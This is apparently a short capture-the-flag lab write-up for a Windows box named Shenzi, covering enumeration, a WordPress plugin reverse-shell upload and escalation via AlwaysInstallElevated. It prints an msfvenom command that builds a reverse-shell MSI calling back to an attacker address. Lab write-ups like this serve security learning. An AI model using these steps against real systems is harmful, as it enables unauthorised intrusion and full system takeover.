🪟Shenzi

IP: 192.168.73.55

Enumeration

Nmap scan

nmap 192.168.73.55 -sV -p- -A

Service Enumeration

TCP/135/445

SMB allows anonymous connection.

Passwords.txt

why.tmp

TCP/80/443

PHPInfo has a lot of information. https://shenzi.com/dashboard/phpinfo.php

Found wordpress site at /shenzi Uploaded reverse shell code into Hello Dolly. hello.php Ran the reverse shell by navigating to http://192.168.73.55/shenzi/wp-content/plugins/hello.php

Shell

Systeminfo

Found that AlwaysInstallElevated is enabled.

Created reverse shell msi. Chose port 21 because I know its already open. 

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.73 LPORT=21 -f msi -o exp3.msi

Curled the installer to shenzi's desktop and ran exp3.msi

Root

PreviousInternalNextJacko

Last updated

Was this helpful?